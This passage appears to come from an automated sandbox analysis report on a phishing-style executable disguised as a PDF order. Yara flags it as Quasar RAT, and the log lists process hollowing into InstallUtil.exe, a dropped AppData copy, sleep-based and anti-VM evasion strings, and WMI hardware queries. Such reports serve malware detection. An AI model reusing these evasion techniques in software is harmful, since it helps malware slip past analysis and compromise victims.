                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 180, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MaxGeneration.exe PID: 1344, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1722029295.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: DF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: 27C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: 47C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: 72F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: 82F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2890000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 26B0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeMemory allocated: 3230000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeMemory allocated: 3430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeMemory allocated: 5430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeMemory allocated: 7F20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeMemory allocated: 8F20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1600000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3130000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 3030000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeWindow / User API: threadDelayed 1324Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeWindow / User API: threadDelayed 4721Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 490Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 706Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeWindow / User API: threadDelayed 1958Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeWindow / User API: threadDelayed 2812Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -15679732462653109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 4124Thread sleep count: 1324 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 4124Thread sleep count: 4721 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -99741s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -99625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -99516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -99400s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -99281s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -99172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -99056s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -98938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -98813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -98688s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -98563s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -98438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -98221s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -98082s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -97063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 5544Thread sleep time: -96938s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4432Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 5344Thread sleep count: 1958 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 5344Thread sleep count: 2812 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -99766s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -99545s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -99321s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -99203s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -99094s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -98973s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -98844s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -98734s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -98625s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -98515s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -98392s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -98210s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -98044s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -97910s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -97722s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -97599s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -97469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -97359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exe TID: 2504Thread sleep time: -97250s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2836Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99741Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99625Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99516Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99400Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99281Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99172Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99056Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98938Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98813Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98688Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98563Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98438Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98221Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98082Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97953Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97844Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97734Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97625Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97516Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97406Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97297Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97188Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97063Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96938Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 99545Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 99321Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 99203Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 99094Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 98973Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 98844Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 98734Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 98625Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 98515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 98392Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 98210Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 98044Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 97910Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 97722Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 97599Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 97469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 97359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeThread delayed: delay time: 97250Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: MaxGeneration.exe, 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: InstallUtil.exe, 00000001.00000002.2935903636.0000000005147000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.2951305620.0000000006E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: MaxGeneration.exe, 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                    Source: wscript.exe, 00000002.00000002.1814746517.0000024BE2FA4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef000
                    Source: InstallUtil.exe, 00000001.00000002.2935903636.0000000005147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                    Source: Order88983273293729387293828PDF.exe, 00000000.00000002.1735284737.0000000005460000.00000004.00000020.00020000.00000000.sdmp, MaxGeneration.exe, 00000003.00000002.1910445057.00000000061C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\MaxGeneration.exe "C:\Users\user\AppData\Roaming\MaxGeneration.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeQueries volume information: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeQueries volume information: C:\Users\user\AppData\Roaming\MaxGeneration.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\MaxGeneration.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Quasar RAT
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3dbbcb0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.MaxGeneration.exe.48c1690.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
